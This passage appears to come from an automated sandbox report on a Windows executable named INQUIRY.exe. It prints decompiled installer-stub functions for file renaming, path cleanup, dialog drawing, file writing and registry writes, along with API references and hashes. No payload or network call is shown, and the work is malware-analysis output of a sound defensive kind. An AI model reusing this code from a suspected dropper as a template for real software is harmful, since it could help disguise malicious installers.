						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004057d9
0x004057e0
0x004057e4
0x004057ed
0x004057f1
0x00405930
0x00405930
0x00000000
0x00405930
0x004057f1
0x004057fd
0x00405813
0x0040583b
0x00405846
0x0040584a
0x0040586a
0x0040586c
0x00405871
0x0040587b
0x00405888
0x0040588d
0x00405892
0x00405896
0x00000000
0x00000000
0x004058a5
0x004058a7
0x004058b4
0x004058b8
0x00405929
0x0040592a
0x00000000
0x004058d4
0x004058e1
0x00405946
0x0040594d
0x004058f4
0x004058f4
0x004058f6
0x004058ff
0x0040590a
0x0040591c
0x00405923
0x00000000
0x00405923
0x0040594f
0x00405950
0x00405955
0x00405957
0x00405964
0x00405964
0x00405968
0x00000000
0x00000000
0x00000000
0x00000000
0x00405959
0x00405959
0x0040595c
0x0040595f
0x00405960
0x00000000
0x00405959
0x004058ec
0x004058f1
0x00000000
0x004058f1
0x004058b8
0x00405815
0x00405820
0x00405829
0x0040582d
0x00000000
0x00000000
0x0040582d
0x0040593a

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E
%s=%s, xrefs: 0040585A

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405ce5
0x00405ced
0x00405d01
0x00405d01
0x00405d07
0x00405d14
0x00405d14
0x00405d15
0x00405d17
0x00405d1b
0x00405d1d
0x00405d26
0x00405d28
0x00405d42
0x00405d4a
0x00405d4a
0x00405d4f
0x00405d51
0x00405d53
0x00405d57
0x00405d58
0x00405d5b
0x00405d63
0x00405d65
0x00405d69
0x00000000
0x00000000
0x00405d6f
0x00405d74
0x00000000
0x00000000
0x00000000
0x00405d74
0x00405d79

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

*?|<>/":, xrefs: 00405D2B
"C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 00405CE9
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\INQUIRY.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1527370665
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403eb0
0x00403f44
0x00000000
0x00403f44
0x00403ec1
0x00403ec5
0x00000000
0x00000000
0x00403ecb
0x00403ed4
0x00403ed7
0x00403ed7
0x00403edd
0x00403ee3
0x00403ee3
0x00403eef
0x00403ef5
0x00403efc
0x00403eff
0x00403f02
0x00403f04
0x00403f04
0x00403f0c
0x00403f12
0x00403f12
0x00403f1c
0x00403f21
0x00403f24
0x00403f29
0x00403f2c
0x00403f2c
0x00403f3c
0x00403f3c
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0xb600
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040266e
0x00402670
0x0040267c
0x0040267f
0x00402689
0x0040268d
0x0040268d
0x00402693
0x004026a0
0x004026a8
0x004026ab
0x004026b1
0x004026bf
0x004026c4
0x004026c8
0x004026cb
0x004026d4
0x004026e0
0x004026e4
0x004026e7
0x004026f1
0x00402710
0x004026f8
0x004026fd
0x00402705
0x00402708
0x0040270d
0x0040270d
0x00402717
0x00402717
0x00402729
0x00402730
0x00402742
0x00402742
0x00402748
0x00402748
0x00402753
0x00402754
0x00402758
0x0040275c
0x00402762
0x00402762
0x00402769
0x00402156
0x00402880
0x0040288c

APIs

GlobalAlloc.KERNEL32(00000040,0000B600,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404e29
0x00404e35
0x00404e38
0x00404e3e
0x00404e4a
0x00404e4d
0x00404e50
0x00404e56
0x00404e56
0x00404e5c
0x00404e64
0x00404e67
0x00404e84
0x00404e88
0x00404e91
0x00404e91
0x00404e9b
0x00404ea4
0x00404eb0
0x00404eb7
0x00404ebb
0x00404ebe
0x00404ed1
0x00404edf
0x00404edf
0x00404ee3
0x00404ee5
0x00404ee8
0x00000000
0x00404ee8
0x00404e69
0x00404e71
0x00404e79
0x00404e7f
0x00000000
0x00404e7f
0x00404e79
0x00404e67
0x00404ef2

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404700
0x0040470d
0x00404713
0x00404751
0x00404751
0x00404760
0x00404767
0x00000000
0x00404769
0x00404715
0x00404724
0x0040472c
0x0040472f
0x00404741
0x00404747
0x0040474e
0x00000000
0x0040474e
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

unpacking data: %d%%, xrefs: 00402B6A, 00402B7A
verifying installer: %d%%, xrefs: 00402B71

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x0040231c
0x00402322
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc48D6.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc48D6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
